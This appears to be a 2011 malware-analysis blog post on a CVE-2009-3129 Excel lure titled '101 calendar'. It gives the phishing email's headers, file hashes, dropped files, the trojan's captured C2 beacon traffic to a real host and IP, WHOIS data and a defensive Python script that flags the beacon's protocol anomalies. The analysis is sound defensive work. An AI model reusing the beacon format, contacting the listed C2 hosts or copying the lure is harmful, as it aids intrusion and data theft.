Thursday, October 27, 2011

Oct 18 CVE-2009-3129 XLS 2011-10-18 101 calendar


Another day, another sample: a CVE-2009-3129 XLS file from kevins19702@gmail.com, though it was actually sent through a Hinet server (I guess Gmail addresses are accepted better than Hinet ones).

The trojan calls home to 220.246.76.125:

POST http://check.amanerolor.com:443/index.php HTTP/1.0


Common Vulnerabilities and Exposures (CVE) number

CVE-2009-3129 Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Office Excel Viewer 2003 SP3; Office Excel Viewer SP1 and SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a spreadsheet with a FEATHEADER record containing an invalid cbHdrData size element that affects a pointer offset, aka "Excel Featheader Record Memory Corruption Vulnerability."

General File Information

File: 101.xls
Size: 224279
MD5:  B344B78FB07B63105A52F6ECFB0EDFB0


Original Message

From: kevin [mailto:kevins19702@gmail.com]
Sent: Tuesday, October 18, 2011 4:04 AM
To: ;
Subject: Fw: Forward: Fw: 101 calendar - white background (original subject: Fw: 轉發: Fw: 101年曆--白色底)

----- Original Message -----
From:
Sent: Friday, September 30, 2011 9:48 AM
Subject: Forward: Fw: 101 calendar - white background (original subject: 轉發: Fw: 101年曆--白色底)

 

Message Headers

Received: (qmail 25116 invoked from network); 18 Oct 2011 08:10:57 -0000
Received: from 220-130-232-133.hinet-ip.hinet.net (HELO pgmall) (220.130.232.133)
  by xxxxxxxxxxx
Message-ID: <000901cc8d6c$854b9810$3c01a8c0@pgmall>
From: "kevin" <kevins19702@gmail.com>
To: <Undisclosed-Recipient:;>
Subject: =?big5?B?Rnc6IMLgtW+hRyBGdzogMTAxpn6+5C0tpdWm4qmz?=
Date: Tue, 18 Oct 2011 16:04:11 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0005_01CC8DAF.92F7AC40"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.2001
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.2001


Automated Scans

www.virustotal.com/file-scan/report.html?id=b72208aeaed0a63b5a72e3043b50c7d3203c4776421aeb798313990f9d3aa242-1319678165

Created files

\Temp\101.xls - decoy document, "author" metadata field: kmph57
\Temp\Excel.exe

File: Excel.exe
Size: 155648
MD5:  90F252E157B6494BE831CC72CB528A0B

http://anubis.iseclab.org/?action=result&task_id=10a5cb526a31780f4b1ae7506e4a60acf

Traffic

POST http://check.amanerolor.com:443/index.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0.4; Win32)
Host: 220.246.76.125:1292578
Content-Length: 46
Pragma: no-cache
................................FB.B..C..H.C.jHTTP/1.0 200 OK
Date: Sun, 03 Aug 2003 13:41:30 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)
Content-Length: 43
accept-type: x-wav/y-img
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
................................]...^..P..jPOST http://check.amanerolor.com:443/index.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0.4; Win32)
Host: 220.246.76.125:1292578
Content-Length: 682
Pragma: no-cache

.new_host_9.......b.......b.........jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj.jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjK.jjjjjjjFB.B..C..H.C.jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj..\.jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj?jjjjjjjjjjjjjjjjjHTTP/1.0 200 OK
Date: Sun, 03 Aug 2003 13:41:30 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)
Content-Length: 32
accept-type: x-wav/y-img
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
................................POST http://check.amanerolor.com:443/index.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0.4; Win32)
Host: 220.246.76.125:1292578
Content-Length: 32
Pragma: no-cache

.new_host_9..........ig.........HTTP/1.0 200 OK
Date: Sun, 03 Aug 2003 13:41:30 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)
Content-Length: 32
accept-type: x-wav/y-img
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
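
What a defender can take from the capture above is a handful of traits a proxy log or IDS can match on: a plaintext HTTP/1.0 POST to a URL on port 443, a Host header carrying a port that cannot exist, a server Date header frozen at 3 Aug 2003 on every reply, and a header name ("accept-type") that does not exist in HTTP. The script below is an added example, not code from this post or from any tool it references. It runs over a constructed excerpt that reproduces the headers shown above (the binary bodies are replaced by runs of "x", glued onto the next start line exactly as in the capture) and reports those anomalies. The capture year 2011 comes from the post's date; carving the stream on request/status lines rather than Content-Length is my own choice for coping with the concatenated bodies.

```python
import re
from email.utils import parsedate_to_datetime
from typing import Dict, List, Optional, Tuple

# Constructed excerpt modelled on the capture in the post: the headers are the
# ones shown there, the binary bodies are replaced by runs of "x". As in the
# real capture, each body runs straight into the next start line.
def _req(length: int) -> str:
    return ("POST http://check.amanerolor.com:443/index.php HTTP/1.0\r\n"
            "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0.4; Win32)\r\n"
            "Host: 220.246.76.125:1292578\r\n"
            f"Content-Length: {length}\r\nPragma: no-cache\r\n\r\n" + "x" * length)


def _resp(length: int) -> str:
    return ("HTTP/1.0 200 OK\r\nDate: Sun, 03 Aug 2003 13:41:30 GMT\r\n"
            "Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)\r\n"
            f"Content-Length: {length}\r\naccept-type: x-wav/y-img\r\n"
            "Content-Type: application/octet-stream\r\n"
            "Proxy-Connection: keep-alive\r\n\r\n" + "x" * length)


SAMPLE_STREAM = _req(46) + _resp(43) + _req(32) + _resp(32)

# Header names that do not exist in HTTP; a browser or a real Apache never sends them.
NON_STANDARD_HEADERS = {"accept-type"}

# Zero-width split points: a request line or a status line. Splitting on start
# lines rather than Content-Length copes with bodies glued onto the next message.
MESSAGE_START = re.compile(r"(?=(?:GET|POST|HEAD) \S+ HTTP/1\.[01]\r\n|HTTP/1\.[01] \d{3} )")


def split_messages(stream: str) -> List[Tuple[str, Dict[str, str]]]:
    """Carve a plaintext HTTP stream into (start_line, headers) pairs; bodies are dropped."""
    messages = []
    for chunk in MESSAGE_START.split(stream):
        if not chunk.strip():
            continue
        head = chunk.split("\r\n\r\n", 1)[0]
        lines = head.split("\r\n")
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        messages.append((lines[0], headers))
    return messages


def host_port(host: str) -> Optional[int]:
    """Numeric port from a Host header value, or None if there is none."""
    _, sep, port = host.rpartition(":")
    return int(port) if sep and port.isdigit() else None


def analyse_stream(stream: str, capture_year: int = 2011) -> List[str]:
    """Report the beacon traits visible in the capture. capture_year defaults to
    the year of the post, so a server Date far from it is flagged as a fake clock."""
    findings: List[str] = []
    dates: List[str] = []
    for idx, (start, headers) in enumerate(split_messages(stream)):
        if start.startswith("HTTP/"):                      # response
            for name in sorted(headers):
                if name in NON_STANDARD_HEADERS:
                    findings.append(f"msg {idx}: non-standard header '{name}: {headers[name]}'")
            if "date" in headers:
                dates.append(headers["date"])
                try:
                    year = parsedate_to_datetime(headers["date"]).year
                except (TypeError, ValueError):
                    year = None
                if year is not None and abs(year - capture_year) >= 1:
                    findings.append(f"msg {idx}: server Date year {year} vs capture year {capture_year}")
            continue
        method, target, version = start.split(" ", 2)   # request
        if re.match(r"http://[^/]+:443(?:/|$)", target):
            findings.append(f"msg {idx}: plaintext {version} {method} to a port-443 URL ({target})")
        port = host_port(headers.get("host", ""))
        if port is not None and not 1 <= port <= 65535:
            findings.append(f"msg {idx}: impossible Host port {port}")
    if len(dates) > 1 and len(set(dates)) == 1:
        findings.append(f"all {len(dates)} responses carry the identical Date header: {dates[0]}")
    return findings


if __name__ == "__main__":
    for line in analyse_stream(SAMPLE_STREAM):
        print(line)
```

Each of these checks is cheap enough to run on proxy logs or on a full-packet capture replayed through a parser, and none of them depends on the domain or IP, which is the point: the C2 host changes between samples, the malformed protocol habits tend not to. The start-line carving does assume a body never happens to begin with text that looks like a request or status line; for binary beacons like these that is a safe bet, for arbitrary traffic prefer a real HTTP parser.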



220.246.76.125
125.76.246.220.static.netvigator.com
Host reachable, 287 ms. average

220.246.0.0 - 220.246.255.255

PCCW Limited
PO Box 9896 GPO Hong Kong
Hong Kong

NETVIGATOR ADMINISTRATORS
PO Box 9896 GPO
Hong Kong
phone: +852-2888-2888
pmaster@netvigator.com

==========================
amanerolor.com
taiwan
taipei, 999079
Taiwan

william bottle (john.fielder@hotmail.com )
+886.11111111
Fax:
taiwan
taipei, 999079
Taiwan
